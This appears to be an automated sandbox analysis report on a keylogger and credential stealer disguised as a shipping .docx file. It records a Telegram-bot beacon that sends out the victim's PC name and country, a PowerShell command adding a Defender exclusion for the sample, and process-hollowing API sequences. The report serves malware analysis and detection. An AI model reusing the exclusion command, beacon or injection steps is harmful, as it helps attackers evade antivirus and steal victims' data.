                                                                                                                                                                    2024-12-17 07:33:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.449758149.154.167.2204436644C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-17 07:33:39 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2018/12/2024%20/%2006:26:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-17 07:33:40 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Tue, 17 Dec 2024 07:33:39 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                    2024-12-17 07:33:40 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:02:33:07
                                                                                                                                                                    Start date:17/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                                                                                                                                                                    Imagebase:0x4e0000
                                                                                                                                                                    File size:906'240 bytes
                                                                                                                                                                    MD5 hash:BF49FB7C260B15A61C5849A49FDEE343
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:02:33:09
                                                                                                                                                                    Start date:17/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                                                                                                                                                                    Imagebase:0xca0000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:02:33:09
                                                                                                                                                                    Start date:17/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe"
                                                                                                                                                                    Imagebase:0xf00000
                                                                                                                                                                    File size:906'240 bytes
                                                                                                                                                                    MD5 hash:BF49FB7C260B15A61C5849A49FDEE343
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:02:33:09
                                                                                                                                                                    Start date:17/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12.3%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:5.4%
                                                                                                                                                                      Total number of Nodes:202
                                                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                                                      execution_graph 40901 79abb28 40902 79abb42 40901->40902 40914 79ac515 40902->40914 40918 79ac557 40902->40918 40923 79ac176 40902->40923 40928 79ac5f3 40902->40928 40933 79ac352 40902->40933 40938 79abf1f 40902->40938 40942 79abf89 40902->40942 40947 79abfab 40902->40947 40952 79ac0bb 40902->40952 40960 79ac1f5 40902->40960 40903 79abb66 40965 79a9f38 40914->40965 40969 79a9f30 40914->40969 40915 79ac538 40915->40903 40919 79ac564 40918->40919 40973 79aa0c8 40919->40973 40977 79aa0d0 40919->40977 40920 79ac75c 40925 79ac185 40923->40925 40924 79ac930 40924->40903 40981 79a9e88 40925->40981 40985 79a9e80 40925->40985 40929 79ac6ac 40928->40929 40989 79aa238 40929->40989 40993 79aa5c0 40929->40993 40930 79ac6ce 40934 79ac35b 40933->40934 40936 79aa0c8 WriteProcessMemory 40934->40936 40937 79aa0d0 WriteProcessMemory 40934->40937 40935 79ac5d4 40936->40935 40937->40935 40997 79aa758 40938->40997 41001 79aa74c 40938->41001 40943 79abf9d 40942->40943 41005 79aa008 40943->41005 41009 79aa010 40943->41009 40944 79ac33d 40944->40903 40948 79abfc5 40947->40948 40950 79a9e88 ResumeThread 40948->40950 40951 79a9e80 ResumeThread 40948->40951 40949 79ac930 40949->40903 40950->40949 40951->40949 40953 79ac0c8 40952->40953 40954 79abfaa 40952->40954 40956 79a9f38 Wow64SetThreadContext 40953->40956 40957 79a9f30 Wow64SetThreadContext 40953->40957 40958 79a9e88 ResumeThread 40954->40958 40959 79a9e80 ResumeThread 40954->40959 40955 79ac930 40955->40903 40956->40954 40957->40954 40958->40955 40959->40955 40961 79ac3b6 40960->40961 40963 79aa0c8 WriteProcessMemory 40961->40963 40964 79aa0d0 WriteProcessMemory 40961->40964 40962 79ac3a8 40962->40903 40963->40962 40964->40962 40966 79a9f7d Wow64SetThreadContext 40965->40966 40968 79a9fc5 40966->40968 40968->40915 40970 79a9f38 Wow64SetThreadContext 40969->40970 40972 79a9fc5 40970->40972 40972->40915 40974 79aa0d0 WriteProcessMemory 40973->40974 40976 79aa16f 40974->40976 40976->40920 40978 79aa118 WriteProcessMemory 40977->40978 40980 79aa16f 40978->40980 40980->40920 40982 79a9ec8 ResumeThread 40981->40982 40984 79a9ef9 40982->40984 40984->40924 40986 79a9e88 ResumeThread 40985->40986 40988 79a9ef9 40986->40988 40988->40924 40990 79aa23d ReadProcessMemory 40989->40990 40992 79aa64f 40990->40992 40992->40930 40994 79aa60b ReadProcessMemory 40993->40994 40996 79aa64f 40994->40996 40996->40930 40998 79aa7e1 40997->40998 40998->40998 40999 79aa946 CreateProcessA 40998->40999 41000 79aa9a3 40999->41000 41002 79aa7e1 41001->41002 41002->41002 41003 79aa946 CreateProcessA 41002->41003 41004 79aa9a3 41003->41004 41006 79aa010 VirtualAllocEx 41005->41006 41008 79aa08d 41006->41008 41008->40944 41010 79aa050 VirtualAllocEx 41009->41010 41012 79aa08d 41010->41012 41012->40944 40866 774da10 40867 774da58 VirtualProtect 40866->40867 40868 774da92 40867->40868 41013 7740040 41014 774008e DrawTextExW 41013->41014 41016 77400e6 41014->41016 40813 27f4668 40814 27f467a 40813->40814 40815 27f4686 40814->40815 40819 27f4779 40814->40819 40824 27f3e28 40815->40824 40817 27f46a5 40820 27f479d 40819->40820 40828 27f4878 40820->40828 40832 27f4888 40820->40832 40821 27f47a7 40821->40815 40825 27f3e33 40824->40825 40840 27f5c84 40825->40840 40827 27f7037 40827->40817 40830 27f48af 40828->40830 40829 27f498c 40829->40821 40830->40829 40836 27f44b0 40830->40836 40833 27f48af 40832->40833 40834 27f498c 40833->40834 40835 27f44b0 CreateActCtxA 40833->40835 40834->40821 40835->40834 40837 27f5918 CreateActCtxA 40836->40837 40839 27f59db 40837->40839 40841 27f5c8f 40840->40841 40844 27f5e5c 40841->40844 40843 27f7acd 40843->40827 40845 27f5e67 40844->40845 40848 27f7648 40845->40848 40847 27f7ba2 40847->40843 40849 27f7653 40848->40849 40850 27f7678 GetModuleHandleW 40849->40850 40851 27f7ca5 40850->40851 40851->40847 40750 5c30888 40754 5c308b9 40750->40754 40759 5c308c8 40750->40759 40751 5c308a7 40755 5c308c8 40754->40755 40764 27f7678 40755->40764 40770 27f8c51 40755->40770 40756 5c3092c 40756->40751 40760 5c308f6 40759->40760 40762 27f7678 GetModuleHandleW 40760->40762 40763 27f8c51 GetModuleHandleW 40760->40763 40761 5c3092c 40761->40751 40762->40761 40763->40761 40765 27f7683 40764->40765 40767 27f8f13 40765->40767 40776 27fb1c1 40765->40776 40766 27f8f51 40766->40756 40767->40766 40780 27fd288 40767->40780 40771 27f8c8b 40770->40771 40773 27f8f13 40771->40773 40775 27fb1c1 GetModuleHandleW 40771->40775 40772 27f8f51 40772->40756 40773->40772 40774 27fd288 GetModuleHandleW 40773->40774 40774->40772 40775->40773 40785 27fb1f8 40776->40785 40788 27fb1e8 40776->40788 40777 27fb1d6 40777->40767 40781 27fd2b9 40780->40781 40782 27fd2dd 40781->40782 40797 27fd437 40781->40797 40801 27fd448 40781->40801 40782->40766 40792 27fb2e0 40785->40792 40786 27fb207 40786->40777 40789 27fb1f8 40788->40789 40791 27fb2e0 GetModuleHandleW 40789->40791 40790 27fb207 40790->40777 40791->40790 40793 27fb324 40792->40793 40796 27fb301 40792->40796 40793->40786 40794 27fb528 GetModuleHandleW 40795 27fb555 40794->40795 40795->40786 40796->40793 40796->40794 40800 27fd455 40797->40800 40798 27fd48f 40798->40782 40800->40798 40805 27fcfa8 40800->40805 40802 27fd455 40801->40802 40803 27fd48f 40802->40803 40804 27fcfa8 GetModuleHandleW 40802->40804 40803->40782 40804->40803 40806 27fcfb3 40805->40806 40808 27fdda0 40806->40808 40809 27fd0d4 40806->40809 40808->40808 40810 27fd0df 40809->40810 40811 27f7678 GetModuleHandleW 40810->40811 40812 27fde0f 40811->40812 40812->40808 40869 774db18 40870 774db3f 40869->40870 40874 774ddf0 40870->40874 40879 774dde2 40870->40879 40871 774dbb6 40876 774de17 40874->40876 40875 774de64 40875->40871 40876->40875 40884 79accbf 40876->40884 40889 79accd0 40876->40889 40880 774de17 40879->40880 40881 774de64 40880->40881 40882 79accbf PostMessageW 40880->40882 40883 79accd0 PostMessageW 40880->40883 40881->40871 40882->40880 40883->40880 40885 79acc9a 40884->40885 40886 79accc3 40884->40886 40885->40876 40887 79accf0 40886->40887 40893 79acd38 40886->40893 40887->40876 40890 79acce2 40889->40890 40891 79accf0 40890->40891 40892 79acd38 PostMessageW 40890->40892 40891->40876 40892->40891 40894 79acd1a 40893->40894 40897 79acd43 40893->40897 40894->40887 40895 79aced3 40895->40887 40897->40895 40898 79aa228 40897->40898 40899 79acfc8 PostMessageW 40898->40899 40900 79ad034 40899->40900 40900->40897 40852 27fd560 40853 27fd5a6 40852->40853 40857 27fd738 40853->40857 40860 27fd740 40853->40860 40854 27fd693 40858 27fd76e 40857->40858 40863 27fd070 40857->40863 40858->40854 40861 27fd070 DuplicateHandle 40860->40861 40862 27fd76e 40861->40862 40862->40854 40864 27fd7a8 DuplicateHandle 40863->40864 40865 27fd83e 40864->40865 40865->40858

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 418 7748a10-7748a1a 420 7748a4e 418->420 421 7748a57-7748a5d 420->421 422 7748a50-7748a5d 420->422 424 7748ad3-7748ad6 421->424 425 7748a5f-7748a75 421->425 422->424 422->425 428 7748ad7-7748ada 424->428 429 7748adf-7748ae1 424->429 426 7748a77-7748a8a 425->426 427 7748aeb-7748aee 425->427 438 7748a93-7748a98 426->438 439 7748a8c-7748a92 426->439 431 7748af7-7748af9 427->431 432 7748aef-7748af2 427->432 430 7748ae3-7748ae6 428->430 434 7748adc 428->434 429->430 430->432 435 7748ae8-7748aea 430->435 437 7748afb-7748afd 431->437 432->437 440 7748af3-7748af6 432->440 434->429 435->427 435->440 441 7748b73-7748b92 call 77490d0 437->441 442 7748aff-7748b06 437->442 444 7748a9b-7748a9e 438->444 443 7748a94-7748a9e 439->443 439->444 440->431 440->442 458 7748b98 441->458 447 7748b0f-7748b10 442->447 448 7748b08-7748b0e 442->448 445 7748aa7-7748aaa 443->445 446 7748aa0-7748aa6 443->446 444->445 444->446 450 7748ab3-7748ab6 445->450 451 7748aab-7748aad 445->451 453 7748aaf-7748ab1 446->453 454 7748aa8-7748ab6 446->454 452 7748b17-7748b20 447->452 448->447 448->452 455 7748ab8-7748aba 450->455 451->453 456 7748b22-7748b46 452->456 457 7748acb-7748acc 452->457 453->450 454->455 462 7748ac3-7748ac5 455->462 463 7748abc-7748ac2 455->463 459 7748b4d 456->459 457->459 460 7748ace 457->460 464 7748b9f-7748bbb 458->464 467 7748b54-7748b71 459->467 468 7748b4f 459->468 460->428 466 7748ad0-7748ad1 460->466 465 7748ac7-7748ac8 462->465 463->457 469 7748ac4-7748ac5 463->469 470 7748bc4-7748bc5 464->470 471 7748bbd 464->471 465->420 466->424 467->441 468->467 469->465 484 7748f1b-7748f22 470->484 471->458 471->470 472 7748ed5-7748ee1 471->472 473 7748d36-7748d56 471->473 474 7748c96-7748ca8 471->474 475 7748d77-7748d8c 471->475 476 7748bf7-7748c09 471->476 477 7748cd0-7748cdc 471->477 478 7748d91-7748d9e 471->478 479 7748dbd-7748dc1 471->479 480 7748e1d-7748e29 471->480 481 7748d1f-7748d31 471->481 482 7748eff-7748f16 471->482 483 7748cfa-7748d1a 471->483 471->484 485 7748d5b-7748d72 471->485 486 7748c40-7748c58 471->486 487 7748da3-7748db8 471->487 488 7748ded-7748df1 471->488 489 7748cad-7748ccb 471->489 490 7748bca-7748bce 471->490 491 7748c0b-7748c14 471->491 492 7748eab-7748ed0 471->492 493 7748ee3 472->493 494 7748ee8-7748efa 472->494 473->464 474->464 475->464 476->464 503 7748ce3-7748cf5 477->503 504 7748cde 477->504 478->464 495 7748dd4-7748ddb 479->495 496 7748dc3-7748dd2 479->496 501 7748e30-7748e46 480->501 502 7748e2b 480->502 481->464 482->464 483->464 485->464 497 7748c5f-7748c75 486->497 498 7748c5a 486->498 487->464 499 7748e04-7748e0b 488->499 500 7748df3-7748e02 488->500 489->464 505 7748bd0-7748bdf 490->505 506 7748be1-7748be8 490->506 507 7748c16-7748c25 491->507 508 7748c27-7748c2e 491->508 492->464 493->494 494->464 509 7748de2-7748de8 495->509 496->509 521 7748c77 497->521 522 7748c7c-7748c91 497->522 498->497 510 7748e12-7748e18 499->510 500->510 523 7748e4d-7748e63 501->523 524 7748e48 501->524 502->501 503->464 504->503 513 7748bef-7748bf5 505->513 506->513 515 7748c35-7748c3b 507->515 508->515 509->464 510->464 513->464 515->464 521->522 522->464 527 7748e65 523->527 528 7748e6a-7748e80 523->528 524->523 527->528 530 7748e87-7748ea6 528->530 531 7748e82 528->531 530->464 531->530
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                                                      • Opcode ID: b4d3cd43b2c44709b846752afd01b01becd6b44fafe9b897cc21f58fdbdb7fec
                                                                                                                                                                      • Instruction ID: f45e8f7a94973a526ea33b0c5fbce33fef438d17612f2c328bec5ff698a71da1
                                                                                                                                                                      • Opcode Fuzzy Hash: b4d3cd43b2c44709b846752afd01b01becd6b44fafe9b897cc21f58fdbdb7fec
                                                                                                                                                                      • Instruction Fuzzy Hash: AFF1D0F1E1425ACFCB14CFA9D4444EEFBB2FF4A390B14855AD4119B255C334AA82CF86

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 534 7746521-7746522 535 7746524-7746529 534->535 536 774652b-774652e 534->536 535->536 537 7746537-774653a 536->537 538 774652f-7746532 536->538 540 774653b-774653e 537->540 541 7746543-7746546 537->541 539 7746534-7746536 538->539 538->540 539->537 542 774653f-7746540 539->542 540->542 543 7746547-774654a 540->543 541->543 544 774654f-7746552 541->544 547 7746542 542->547 548 774659d-774659e 542->548 545 7746553-7746556 543->545 549 774654b 543->549 544->545 546 774655b-774655c 544->546 552 774655f-7746560 545->552 553 7746558 545->553 546->552 547->541 547->549 550 77465a7-77465ad 548->550 551 774659f-77465a1 548->551 549->544 557 77465af-77465b4 550->557 554 77465a3-77465a6 551->554 558 7746561-7746562 552->558 559 77465be-77465e3 552->559 555 77465b5-77465bd 553->555 556 774655a 553->556 554->550 554->557 555->559 560 7746563-7746568 556->560 562 774655c-7746562 556->562 557->555 558->560 561 774656b-774656e 558->561 568 77465e5 559->568 569 77465ea-7746644 559->569 564 774656a 560->564 565 7746577-7746579 561->565 566 7746570 561->566 562->561 567 7746564-7746568 562->567 571 7746573-7746575 564->571 572 774656c-774656e 564->572 570 774657b-774657e 565->570 566->570 573 7746574-7746575 566->573 567->564 568->569 585 7746647 569->585 574 774657f-7746586 570->574 575 7746587-774658a 570->575 571->565 571->574 572->565 572->566 573->574 577 7746578-774657e 573->577 574->575 579 774658f 574->579 580 7746593-774659a 575->580 581 774658c 575->581 577->575 578 7746580-7746586 577->578 578->579 583 7746588-774658a 578->583 579->580 580->554 584 774659c-774659e 580->584 581->580 583->580 583->581 584->550 588 77465a0-77465a6 584->588 587 774664e-774666a 585->587 589 7746673-7746674 587->589 590 774666c 587->590 588->557 591 77465a8-77465bd 588->591 592 7746820-7746890 589->592 593 7746679-77466a1 589->593 590->585 590->592 590->593 594 7746776-774678b 590->594 595 77466b7-77466d7 590->595 596 7746790-77467be 590->596 597 77466dc-77466e0 590->597 598 77467ff-774681b 590->598 599 774673b-7746771 590->599 600 77467c3-77467de 590->600 601 77466a3-77466b5 590->601 602 77467e3-77467fa 590->602 603 774670c-7746736 590->603 591->559 619 7746892 call 7748967 592->619 620 7746892 call 7748918 592->620 621 7746892 call 7747caa 592->621 622 7746892 call 7747f7b 592->622 593->587 594->587 595->587 596->587 604 77466e2-77466f1 597->604 605 77466f3-77466fa 597->605 598->587 599->587 600->587 601->587 602->587 603->587 611 7746701-7746707 604->611 605->611 611->587 618 7746898-77468a2 619->618 620->618 621->618 622->618
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Te^q$Te^q$z^I
                                                                                                                                                                      • API String ID: 0-2886491258
                                                                                                                                                                      • Opcode ID: 4e973f07dd3a93ddd82e16fa28dfc43a2595cc943ea728ccd23d78d168a30f62
                                                                                                                                                                      • Instruction ID: 61fb448192999bfa744e3edafc196bfc0e3dfc9ea0aa44ef89f984d748e8b180
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e973f07dd3a93ddd82e16fa28dfc43a2595cc943ea728ccd23d78d168a30f62
                                                                                                                                                                      • Instruction Fuzzy Hash: 68C18EB5E002198FCB14CFA9D9445EDFBB2FF8A350F24852AD414EB268D7309A41CF94

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 623 7748b28-7748b4d 625 7748b54-7748b92 call 77490d0 623->625 626 7748b4f 623->626 629 7748b98 625->629 626->625 630 7748b9f-7748bbb 629->630 631 7748bc4-7748bc5 630->631 632 7748bbd 630->632 645 7748f1b-7748f22 631->645 632->629 632->631 633 7748ed5-7748ee1 632->633 634 7748d36-7748d56 632->634 635 7748c96-7748ca8 632->635 636 7748d77-7748d8c 632->636 637 7748bf7-7748c09 632->637 638 7748cd0-7748cdc 632->638 639 7748d91-7748d9e 632->639 640 7748dbd-7748dc1 632->640 641 7748e1d-7748e29 632->641 642 7748d1f-7748d31 632->642 643 7748eff-7748f16 632->643 644 7748cfa-7748d1a 632->644 632->645 646 7748d5b-7748d72 632->646 647 7748c40-7748c58 632->647 648 7748da3-7748db8 632->648 649 7748ded-7748df1 632->649 650 7748cad-7748ccb 632->650 651 7748bca-7748bce 632->651 652 7748c0b-7748c14 632->652 653 7748eab-7748ed0 632->653 654 7748ee3 633->654 655 7748ee8-7748efa 633->655 634->630 635->630 636->630 637->630 664 7748ce3-7748cf5 638->664 665 7748cde 638->665 639->630 656 7748dd4-7748ddb 640->656 657 7748dc3-7748dd2 640->657 662 7748e30-7748e46 641->662 663 7748e2b 641->663 642->630 643->630 644->630 646->630 658 7748c5f-7748c75 647->658 659 7748c5a 647->659 648->630 660 7748e04-7748e0b 649->660 661 7748df3-7748e02 649->661 650->630 666 7748bd0-7748bdf 651->666 667 7748be1-7748be8 651->667 668 7748c16-7748c25 652->668 669 7748c27-7748c2e 652->669 653->630 654->655 655->630 670 7748de2-7748de8 656->670 657->670 682 7748c77 658->682 683 7748c7c-7748c91 658->683 659->658 671 7748e12-7748e18 660->671 661->671 684 7748e4d-7748e63 662->684 685 7748e48 662->685 663->662 664->630 665->664 674 7748bef-7748bf5 666->674 667->674 676 7748c35-7748c3b 668->676 669->676 670->630 671->630 674->630 676->630 682->683 683->630 688 7748e65 684->688 689 7748e6a-7748e80 684->689 685->684 688->689 691 7748e87-7748ea6 689->691 692 7748e82 689->692 691->630 692->691
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                                                      • Opcode ID: d7f72999ee589574b129783d132b537afdd3f52ece2d9886e3470147d6688f2e
                                                                                                                                                                      • Instruction ID: 0d3ccb7cec073f1d71d72d08730ed5d89f7b047a023496fc8e52e8ecdb2224e4
                                                                                                                                                                      • Opcode Fuzzy Hash: d7f72999ee589574b129783d132b537afdd3f52ece2d9886e3470147d6688f2e
                                                                                                                                                                      • Instruction Fuzzy Hash: BEC145B0D1420ADFCB04CFA9C4858AEFBB2FF8A381B14D559D411AB354D734AA82CF95

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 695 774654d-774654e 696 7746557-7746558 695->696 697 7746550-7746552 695->697 700 77465b5-77465bd 696->700 701 774655a 696->701 698 7746554-7746556 697->698 699 774655b-774655c 697->699 698->696 702 774655f-7746560 698->702 699->702 703 77465be-77465e3 700->703 704 7746563-7746568 701->704 705 774655c-7746562 701->705 702->703 706 7746561-7746562 702->706 713 77465e5 703->713 714 77465ea-7746644 703->714 707 774656a 704->707 709 7746564-7746568 705->709 710 774656b-774656e 705->710 706->704 706->710 715 7746573-7746575 707->715 716 774656c-774656e 707->716 709->707 711 7746577-7746579 710->711 712 7746570 710->712 718 774657b-774657e 711->718 712->718 719 7746574-7746575 712->719 713->714 731 7746647 714->731 715->711 717 774657f-7746586 715->717 716->711 716->712 720 7746587-774658a 717->720 721 774658f 717->721 718->717 718->720 719->717 723 7746578-774657e 719->723 725 7746593-774659a 720->725 726 774658c 720->726 721->725 723->720 724 7746580-7746586 723->724 724->721 728 7746588-774658a 724->728 729 77465a3-77465a6 725->729 730 774659c-774659e 725->730 726->725 728->725 728->726 732 77465a7-77465ad 729->732 733 77465af-77465b4 729->733 730->732 736 77465a0-77465a6 730->736 735 774664e-774666a 731->735 732->733 733->700 737 7746673-7746674 735->737 738 774666c 735->738 736->733 739 77465a8-77465bd 736->739 740 7746820-7746890 737->740 741 7746679-77466a1 737->741 738->731 738->740 738->741 742 7746776-774678b 738->742 743 77466b7-77466d7 738->743 744 7746790-77467be 738->744 745 77466dc-77466e0 738->745 746 77467ff-774681b 738->746 747 774673b-7746771 738->747 748 77467c3-77467de 738->748 749 77466a3-77466b5 738->749 750 77467e3-77467fa 738->750 751 774670c-7746736 738->751 739->703 767 7746892 call 7748967 740->767 768 7746892 call 7748918 740->768 